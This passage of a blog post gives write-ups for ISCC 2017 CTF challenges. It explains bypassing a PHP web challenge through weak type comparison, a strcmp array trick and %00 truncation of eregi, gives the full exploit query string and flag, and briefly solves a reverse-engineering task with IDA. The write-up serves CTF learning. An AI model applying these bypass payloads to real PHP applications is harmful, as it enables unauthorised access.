class="number">2016</span>)?$v1=<span class="number">1</span>:<span class="keyword">NULL</span>;</div><div class="line">    &#125;</div><div class="line">    <span class="comment">#iscc中bar1对应的值不能为数字却要大于2016</span></div><div class="line">    <span class="keyword">if</span>(is_array(@$a[<span class="string">"bar2"</span>]))&#123;</div><div class="line">        <span class="keyword">if</span>(count($a[<span class="string">"bar2"</span>])!==<span class="number">5</span> <span class="keyword">OR</span> !is_array($a[<span class="string">"bar2"</span>][<span class="number">0</span>])) <span class="keyword">die</span>(<span class="string">"nope2"</span>);</div><div class="line">        <span class="comment">#bar2对应的值必须是5个元素的数组且bar2数组的0位必须也是数组。</span></div><div class="line">        $pos = array_search(<span class="string">"nudt"</span>, $a[<span class="string">"bar2"</span>]);</div><div class="line">        $pos===<span class="keyword">false</span>?<span class="keyword">die</span>(<span class="string">"nope3"</span>):<span class="keyword">NULL</span>;</div><div class="line">        <span class="keyword">foreach</span>($a[<span class="string">"bar2"</span>] <span class="keyword">as</span> $key=&gt;$val)&#123;</div><div class="line">            $val===<span class="string">"nudt"</span>?<span class="keyword">die</span>(<span class="string">"nope4"</span>):<span class="keyword">NULL</span>;</div><div class="line">        &#125;</div><div class="line">        <span class="comment">#取数组的每一位与nudt比较，既要含有，又不能含有。</span></div><div class="line">        $v2=<span class="number">1</span>;</div><div class="line"></div><div class="line">    &#125;   </div><div class="line">&#125;</div><div class="line"><span class="comment">#echo $v1," ",$v2;</span></div><div class="line">$c=@$_GET[<span class="string">'cat'</span>];</div><div class="line">$d=@$_GET[<span class="string">'dog'</span>];</div><div class="line"><span class="keyword">if</span>(@$c[<span class="number">1</span>])&#123;</div><div class="line">    <span class="keyword">if</span>(!strcmp($c[<span class="number">1</span>],$d) &amp;&amp; $c[<span class="number">1</span>]!==$d)&#123;</div><div class="line">        <span class="comment">#echo "1234";</span></div><div class="line">        eregi(<span class="string">"3|1|c"</span>,$d.$c[<span class="number">0</span>])?<span class="keyword">die</span>(<span class="string">"nope5"</span>):<span class="keyword">NULL</span>;</div><div class="line">        strpos(($c[<span class="number">0</span>].$d), <span class="string">"isccctf2017"</span>)?$v3=<span class="number">1</span>:<span class="keyword">NULL</span>;</div><div class="line">        </div><div class="line">    &#125;</div><div class="line">    </div><div class="line">&#125;</div><div class="line"><span class="keyword">if</span>($v1 &amp;&amp; $v2 &amp;&amp; $v3)&#123; </div><div class="line">   </div><div class="line">   <span class="keyword">echo</span> $flag;</div><div class="line">&#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure></p>
<p>主要知识是php的弱类型：<strong>当一个整形和一个其他类型行比较的时候，会先把其他类型intval再比。</strong></p>
<p>bar1可以传入字符串格式，比较会强制转换。</p>
<p><code>{&quot;bar1&quot;:&quot;2017a&quot;}</code></p>
<p>bar2传入5位数组且0位也要是数组，</p>
<p><code>array_search()</code></p>
<p>函数比较也是弱类型比较，intval(“nudt”)=0。</p>
<p><code>{&quot;bar2&quot;:[[0],0,0,0,0]}</code></p>
<p>cat也是数组，不过cat[1]要与dog比较，dog需要含有<code>isccctf2017</code>，<code>eregi()</code>可以用<code>%00</code>截断。 </p>
<p><code>cat[0]=1&amp;cat[1][]=1&amp;dog=%00isccctf2017</code></p>
<p><img src="https://github.com/Windylh/image/raw/master/2017.5.5/Web2.png" alt="web2"></p>
<p>payload:<code>?iscc={&quot;bar1&quot;:&quot;2019a&quot;,&quot;bar2&quot;:[[0],0,0,0,0]}&amp;cat[0]=1&amp;cat[1][]=1&amp;dog=%00isccctf2017</code></p>
<p>得到flag：<code>flag{sfklljljdstuaft}</code></p>
<h2 id="Reverse"><a href="#Reverse" class="headerlink" title="Reverse"></a>Reverse</h2><h3 id="你猜"><a href="#你猜" class="headerlink" title="你猜"></a>你猜</h3><p>附件：<a href="https://github.com/Windylh/CTF/raw/master/Isccctf2017/Reverse/Reverse02.zip" target="_blank" rel="external">Reverse02.zip</a></p>
<p>用ida打开，直接找到main，反编译。题目让找到三个string。</p>
<p><img src="https://github.com/Windylh/image/raw/master/2017.5.5/Re1-1.png" alt="Re1-1"></p>
<p>如果要输出good job，就要让sub_400646()返回0，sub_400755()返回1。进入这两个函数。</p>
<p><img src="https://github.com/Windylh/image/raw/master/2017.5.5/Re1-2.png" alt="Re1-2"></p>
<p>sub_400646()函数比较了输入字符串，一排vx就是用于比较的标准字符串，得到两个字符串<code>l1nux</code>、<code>crack</code>。</p>
<p><img src="https://github.com/Windylh/image/raw/master/2017.5.5/Re1-3.png" alt="Re1-3"></p>
<p>sub_400755()函数更简单，按照if语句条件可依次推出字符串，<code>ILCF!</code></p>
<p>flag：<code>flag{l1nux_crack_ILCF!}</code></p>
<h2 id="文章："><a href="#文章：" class="headerlink" title="文章："></a>文章：</h2><blockquote>
<p>1.<a href="http://www.tuicool.com/articles/2E3INnm" target="_blank" rel="external">http://www.tuicool.com/articles/2E3INnm</a></p>
</blockquote>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/WriteUp/" rel="tag"># WriteUp</a>
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/04/30/SQL注入姿势/" rel="next" title="SQL注入姿势">
                <i class="fa fa-chevron-left"></i> SQL注入姿势
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/05/26/5.6小组赛WriteUp/" rel="prev" title="5.2小组赛WriteUp">
                5.2小组赛WriteUp <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="https://raw.githubusercontent.com/Windylh/image/master/logo.jpg"
               alt="Windylh" />
          <p class="site-author-name" itemprop="name">Windylh</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">29</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">12</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/Windylh" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://twitter.com/WindylhPeng" target="_blank" title="Twitter">
                  
                    <i class="fa fa-fw fa-twitter"></i>
                  
                  Twitter
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/u/1553700980" target="_blank" title="Weibo">
                  
                    <i class="fa fa-fw fa-weibo"></i>
                  
                  Weibo
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://blog.izilong.net/" title="Zilong" target="_blank">Zilong</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://iwenhu.cn/" title="Mengchen" target="_blank">Mengchen</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://keysking.github.io/" title="Keysking" target="_blank">Keysking</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://lanvnal.com/" title="LANVNAL" target="_blank">LANVNAL</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://wsimp1er.com/" title="Simp1er" target="_blank">Simp1er</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Basic"><span class="nav-number">1.</span> <span class="nav-text">Basic</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Wheel-Cipher"><span class="nav-number">1.1.</span> <span class="nav-text">Wheel Cipher</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#你猜猜。。"><span class="nav-number">1.2.</span> <span class="nav-text">你猜猜。。</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#公邮密码"><span class="nav-number">1.3.</span> <span class="nav-text">公邮密码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#神秘图片"><span class="nav-number">1.4.</span> <span class="nav-text">神秘图片</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#告诉你个秘密"><span class="nav-number">1.5.</span> <span class="nav-text">告诉你个秘密</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#PHP-encrypt-1"><span class="nav-number">1.6.</span> <span class="nav-text">PHP_encrypt_1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#二维码"><span class="nav-number">1.7.</span> <span class="nav-text">二维码</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Mobile"><span class="nav-number">2.</span> <span class="nav-text">Mobile</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Misc"><span class="nav-number">3.</span> <span class="nav-text">Misc</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#眼见非实"><span class="nav-number">3.1.</span> <span class="nav-text">眼见非实</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#就在其中"><span class="nav-number">3.2.</span> <span class="nav-text">就在其中</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#很普通的Disco"><span class="nav-number">3.3.</span> <span class="nav-text">很普通的Disco</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#很普通的数独"><span class="nav-number">3.4.</span> <span class="nav-text">很普通的数独</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Web"><span class="nav-number">4.</span> <span class="nav-text">Web</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Web签到题，来和我换flag啊！"><span class="nav-number">4.1.</span> <span class="nav-text">Web签到题，来和我换flag啊！</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#WelcomeToMySQL"><span class="nav-number">4.2.</span> <span class="nav-text">WelcomeToMySQL</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#where-is-your-flag"><span class="nav-number">4.3.</span> <span class="nav-text">where is your flag</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#我们一起来日站"><span class="nav-number">4.4.</span> <span class="nav-text">我们一起来日站</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#自相矛盾"><span class="nav-number">4.5.</span> <span class="nav-text">自相矛盾</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Reverse"><span class="nav-number">5.</span> <span class="nav-text">Reverse</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#你猜"><span class="nav-number">5.1.</span> <span class="nav-text">你猜</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#文章："><span class="nav-number">6.</span> <span class="nav-text">文章：</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2017.3 - 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Windylh</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  






  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  


  




	





  





  





  






  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("G38Wjo4XURoegldByMbpMI2C-gzGzoHsz", "PAvMrVY87vPwX9PBcMLfYmw4");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

</body>
</html>
